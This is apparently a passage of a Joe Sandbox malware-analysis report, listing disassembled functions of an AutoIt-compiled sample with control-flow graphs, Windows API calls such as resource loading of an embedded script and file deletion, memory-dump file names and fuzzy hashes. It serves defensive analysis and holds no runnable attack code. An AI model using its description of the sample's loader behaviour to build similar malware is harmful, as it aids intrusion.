                                                                                                                            control_flow_graph 942 ee49a0-ee4a00 call ee7667 GetVersionExW call ee7bcc 947 ee4b0b-ee4b0d 942->947 948 ee4a06 942->948 950 f1d767-f1d773 947->950 949 ee4a09-ee4a0e 948->949 952 ee4a14 949->952 953 ee4b12-ee4b13 949->953 951 f1d774-f1d778 950->951 954 f1d77b-f1d787 951->954 955 f1d77a 951->955 956 ee4a15-ee4a4c call ee7d2c call ee7726 952->956 953->956 954->951 957 f1d789-f1d78e 954->957 955->954 965 f1d864-f1d867 956->965 966 ee4a52-ee4a53 956->966 957->949 959 f1d794-f1d79b 957->959 959->950 961 f1d79d 959->961 964 f1d7a2-f1d7a5 961->964 967 f1d7ab-f1d7c9 964->967 968 ee4a93-ee4aaa GetCurrentProcess IsWow64Process 964->968 969 f1d880-f1d884 965->969 970 f1d869 965->970 966->964 971 ee4a59-ee4a64 966->971 967->968 974 f1d7cf-f1d7d5 967->974 972 ee4aaf-ee4ac0 968->972 973 ee4aac 968->973 978 f1d886-f1d88f 969->978 979 f1d86f-f1d878 969->979 975 f1d86c 970->975 976 ee4a6a-ee4a6c 971->976 977 f1d7ea-f1d7f0 971->977 981 ee4b2b-ee4b35 GetSystemInfo 972->981 982 ee4ac2-ee4ad2 call ee4b37 972->982 973->972 983 f1d7d7-f1d7da 974->983 984 f1d7df-f1d7e5 974->984 975->979 985 f1d805-f1d811 976->985 986 ee4a72-ee4a75 976->986 987 f1d7f2-f1d7f5 977->987 988 f1d7fa-f1d800 977->988 978->975 980 f1d891-f1d894 978->980 979->969 980->979 989 ee4af8-ee4b08 981->989 999 ee4b1f-ee4b29 GetSystemInfo 982->999 1000 ee4ad4-ee4ae1 call ee4b37 982->1000 983->968 984->968 990 f1d813-f1d816 985->990 991 f1d81b-f1d821 985->991 993 f1d831-f1d834 986->993 994 ee4a7b-ee4a8a 986->994 987->968 988->968 990->968 991->968 993->968 996 f1d83a-f1d84f 993->996 997 f1d826-f1d82c 994->997 998 ee4a90 994->998 1001 f1d851-f1d854 996->1001 1002 f1d859-f1d85f 996->1002 997->968 998->968 1003 ee4ae9-ee4aed 999->1003 1007 ee4b18-ee4b1d 1000->1007 1008 ee4ae3-ee4ae7 GetNativeSystemInfo 1000->1008 1001->968 1002->968 1003->989 1006 ee4aef-ee4af2 FreeLibrary 1003->1006 1006->989 1007->1008 1008->1003
                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00EE49CD
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00F6FAEC,00000000,00000000,?), ref: 00EE4A9A
                                                                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00EE4AA1
                                                                                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00EE4AE7
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00EE4AF2
                                                                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00EE4B23
                                                                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00EE4B2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1986165174-0
                                                                                                                            • Opcode ID: 59b257d638ac3957401deed17316e44db083a3f0b13cc834696fc140e8d8358c
                                                                                                                            • Instruction ID: aa4637ae743f5110d7effd32779cbed11616645f5a8d938a7873d4c69c5d4b03
                                                                                                                            • Opcode Fuzzy Hash: 59b257d638ac3957401deed17316e44db083a3f0b13cc834696fc140e8d8358c
                                                                                                                            • Instruction Fuzzy Hash: E691177198D7C8DEC731DB7994501EAFFF5AF2A310B0849ADD0CBA3A81E220E548D759
                                                                                                                            Function 00EE4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1039 ee4e89-ee4ea1 CreateStreamOnHGlobal 1040 ee4ea3-ee4eba FindResourceExW 1039->1040 1041 ee4ec1-ee4ec6 1039->1041 1042 f1d933-f1d942 LoadResource 1040->1042 1043 ee4ec0 1040->1043 1042->1043 1044 f1d948-f1d956 SizeofResource 1042->1044 1043->1041 1044->1043 1045 f1d95c-f1d967 LockResource 1044->1045 1045->1043 1046 f1d96d-f1d98b 1045->1046 1046->1043
                                                                                                                            APIs
                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EE4D8E,?,?,00000000,00000000), ref: 00EE4E99
                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EE4D8E,?,?,00000000,00000000), ref: 00EE4EB0
                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00EE4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EE4E2F), ref: 00F1D937
                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00EE4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EE4E2F), ref: 00F1D94C
                                                                                                                            • LockResource.KERNEL32(00EE4D8E,?,?,00EE4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EE4E2F,00000000), ref: 00F1D95F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                            • String ID: SCRIPT
                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                            • Opcode ID: bb46873736663f3ad82dd9e83fe2d1aa0bbdff550ea0a0ca64d32c9747055eee
                                                                                                                            • Instruction ID: 2ee9ed3cfc3edda08e533067bbef8283122c98f416dea85bd5ed1e41e03e0a32
                                                                                                                            • Opcode Fuzzy Hash: bb46873736663f3ad82dd9e83fe2d1aa0bbdff550ea0a0ca64d32c9747055eee
                                                                                                                            • Instruction Fuzzy Hash: 601170B5240748BFD7218B66EC48F677BBAFBC5B11F10426CF415DA2A0DBB1EC049A60
                                                                                                                            Function 00EEFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpper
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3964851224-0
                                                                                                                            • Opcode ID: 6bc88d5903f4ec166754b9eafb2dc3e137ef06340591c4093a0845b519788a9c
                                                                                                                            • Instruction ID: e63a5956acf442dd3c6ff760653daa5094786d9566ff84ffa09ca8d02a91405c
                                                                                                                            • Opcode Fuzzy Hash: 6bc88d5903f4ec166754b9eafb2dc3e137ef06340591c4093a0845b519788a9c
                                                                                                                            • Instruction Fuzzy Hash: 3B92BB70A08355CFD720DF14C480B6AB7E0BF85314F14986DE98AAB362DBB5EC45DB92
                                                                                                                            Function 00F4445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00F1E398), ref: 00F4446A
                                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00F4447B
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4448B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 48322524-0
                                                                                                                            • Opcode ID: 61409348db10b8e08ee6efba4df6d7b17f8e8a68608ac7d9dcb85b035be0f5dc
                                                                                                                            • Instruction ID: fcc9c553fa5948ee7e5deae1f0064538e456eba85afbfcdf190338a20ade0291
                                                                                                                            • Opcode Fuzzy Hash: 61409348db10b8e08ee6efba4df6d7b17f8e8a68608ac7d9dcb85b035be0f5dc
                                                                                                                            • Instruction Fuzzy Hash: 7AE0D837810504674210AB38FC0D5E97F5C9E05335F100716FC35D11E0E7B46904B995
                                                                                                                            Function 00EEE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • Variable must be of type 'Object'., xrefs: 00F23E62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                                            • API String ID: 0-109567571
                                                                                                                            • Opcode ID: 299d8849075aa3aa8ed7274c87645a67e5cb07e32ad27ca88cfa579312ca1fca
                                                                                                                            • Instruction ID: ef06d3d55913e80f6bfb6c6f9d2d4be16a56c64b2229e6cb8254014d23c18117
                                                                                                                            • Opcode Fuzzy Hash: 299d8849075aa3aa8ed7274c87645a67e5cb07e32ad27ca88cfa579312ca1fca
                                                                                                                            • Instruction Fuzzy Hash: 75A28B74A0029DCFCB24CF56C880AAAB7F1FF59314F289069E819AB351D775ED42DB90
                                                                                                                            Function 00EF09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF0A5B
                                                                                                                            • timeGetTime.WINMM ref: 00EF0D16
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF0E53
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00EF0E61
                                                                                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00EF0EFA
                                                                                                                            • DestroyWindow.USER32 ref: 00EF0F06
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EF0F20
                                                                                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00F24E83
                                                                                                                            • TranslateMessage.USER32(?), ref: 00F25C60
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00F25C6E
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F25C82
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                            • API String ID: 4212290369-3242690629
                                                                                                                            • Opcode ID: c1b0a2643ba2338420cccc9add584758f3bb7dadb592c439a63c3cc84884ea2d
                                                                                                                            • Instruction ID: eb1690d0ddbca3ff6042826a2b425e22fbbd7bcdc9a2c63b97724e470f58ea75
                                                                                                                            • Opcode Fuzzy Hash: c1b0a2643ba2338420cccc9add584758f3bb7dadb592c439a63c3cc84884ea2d
                                                                                                                            • Instruction Fuzzy Hash: 84B23270608745DFD724DF24C884BAEB7E0BF84714F14491DF59AA72A2CB71E884EB82
                                                                                                                            Function 00F49155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F48F5F: __time64.LIBCMT ref: 00F48F69
                                                                                                                              • Part of subcall function 00EE4EE5: _fseek.LIBCMT ref: 00EE4EFD
                                                                                                                            • __wsplitpath.LIBCMT ref: 00F49234
                                                                                                                              • Part of subcall function 00F040FB: __wsplitpath_helper.LIBCMT ref: 00F0413B
                                                                                                                            • _wcscpy.LIBCMT ref: 00F49247
                                                                                                                            • _wcscat.LIBCMT ref: 00F4925A
                                                                                                                            • __wsplitpath.LIBCMT ref: 00F4927F
                                                                                                                            • _wcscat.LIBCMT ref: 00F49295
                                                                                                                            • _wcscat.LIBCMT ref: 00F492A8
                                                                                                                              • Part of subcall function 00F48FA5: _memmove.LIBCMT ref: 00F48FDE
                                                                                                                              • Part of subcall function 00F48FA5: _memmove.LIBCMT ref: 00F48FED
                                                                                                                            • _wcscmp.LIBCMT ref: 00F491EF
                                                                                                                              • Part of subcall function 00F49734: _wcscmp.LIBCMT ref: 00F49824
                                                                                                                              • Part of subcall function 00F49734: _wcscmp.LIBCMT ref: 00F49837
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F49452
                                                                                                                            • _wcsncpy.LIBCMT ref: 00F494C5
                                                                                                                            • DeleteFileW.KERNEL32(?,?), ref: 00F494FB
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F49511
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F49522
                                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F49534
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1500180987-0
                                                                                                                            • Opcode ID: 4293e00a8028972b837bf1c7e5e3a7afb28a74ee4cfec914ce0f2ee0e37a7bcd
                                                                                                                            • Instruction ID: 89f75a525589865f8a5dd117638e6c26438d65f823eb430863dd09ea74122321
                                                                                                                            • Opcode Fuzzy Hash: 4293e00a8028972b837bf1c7e5e3a7afb28a74ee4cfec914ce0f2ee0e37a7bcd
                                                                                                                            • Instruction Fuzzy Hash: 8BC16CB1E00219AADF21DF95CC85ADFBBBCEF45310F0040AAF609E6191DB749A449F61
                                                                                                                            Function 00EE3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00EE3074
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00EE309E
                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE30AF
                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00EE30CC
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE30DC
                                                                                                                            • LoadIconW.USER32(000000A9), ref: 00EE30F2
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE3101
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                            • Opcode ID: 4b03a327af12bc897b20210a88a619c884bba0e5a58419d291cae6ea4212562e
                                                                                                                            • Instruction ID: 23e3a4bfb85f5b20c798ad3f825e500e001f7ec6bf74d3425eefc8f3234c7cc9
                                                                                                                            • Opcode Fuzzy Hash: 4b03a327af12bc897b20210a88a619c884bba0e5a58419d291cae6ea4212562e
                                                                                                                            • Instruction Fuzzy Hash: FC3158B1844349EFDB10CFA4EC89A8DBBF4FB0A710F14446EE590E62A1D3B90589EF51
                                                                                                                            Function 00EE3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00EE3074
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00EE309E
                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE30AF
                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00EE30CC
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE30DC
                                                                                                                            • LoadIconW.USER32(000000A9), ref: 00EE30F2
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE3101
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                            • Opcode ID: c9dd22c77d1ce286390cd79152148b4ccadf29a85292a8afd8284fa3a5d49828
                                                                                                                            • Instruction ID: f1a304fbccc165a3f8ec294080e3c4e373a6c621becd8963202a9c43c9d6c03b
                                                                                                                            • Opcode Fuzzy Hash: c9dd22c77d1ce286390cd79152148b4ccadf29a85292a8afd8284fa3a5d49828
                                                                                                                            • Instruction Fuzzy Hash: C721C4B1D1121CAFDB00DFA4ED89B9DBBF4FB09B00F00412AF921A62A0D7B54548AF91
                                                                                                                            Function 00EE708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FA52F8,?,00EE37AE,?), ref: 00EE4724
                                                                                                                              • Part of subcall function 00F0050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00EE7165), ref: 00F0052D
                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00EE71A8
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F1E8C8
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F1E909
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00F1E947
                                                                                                                            • _wcscat.LIBCMT ref: 00F1E9A0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                            • API String ID: 2673923337-2727554177
                                                                                                                            • Opcode ID: 43b999cef0b12947efe28f40fea47ae87d7a7db33ae28ae23d7cae346aac70f2
                                                                                                                            • Instruction ID: 22ac6e19f573423f0c04e59ee8c92622de6e8765986605625b50d4121a9831e0
                                                                                                                            • Opcode Fuzzy Hash: 43b999cef0b12947efe28f40fea47ae87d7a7db33ae28ae23d7cae346aac70f2
                                                                                                                            • Instruction Fuzzy Hash: 8371D2B25083099EC704EF65EC41AABBBE8FF85310F44052EF495D71A1DB71D948EB52
                                                                                                                            Function 00EE3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00EE3A50
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00EE3A5F
                                                                                                                            • LoadIconW.USER32(00000063), ref: 00EE3A76
                                                                                                                            • LoadIconW.USER32(000000A4), ref: 00EE3A88
                                                                                                                            • LoadIconW.USER32(000000A2), ref: 00EE3A9A
                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EE3AC0
                                                                                                                            • RegisterClassExW.USER32(?), ref: 00EE3B16
                                                                                                                              • Part of subcall function 00EE3041: GetSysColorBrush.USER32(0000000F), ref: 00EE3074
                                                                                                                              • Part of subcall function 00EE3041: RegisterClassExW.USER32(00000030), ref: 00EE309E
                                                                                                                              • Part of subcall function 00EE3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE30AF
                                                                                                                              • Part of subcall function 00EE3041: InitCommonControlsEx.COMCTL32(?), ref: 00EE30CC
                                                                                                                              • Part of subcall function 00EE3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE30DC
                                                                                                                              • Part of subcall function 00EE3041: LoadIconW.USER32(000000A9), ref: 00EE30F2
                                                                                                                              • Part of subcall function 00EE3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE3101
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
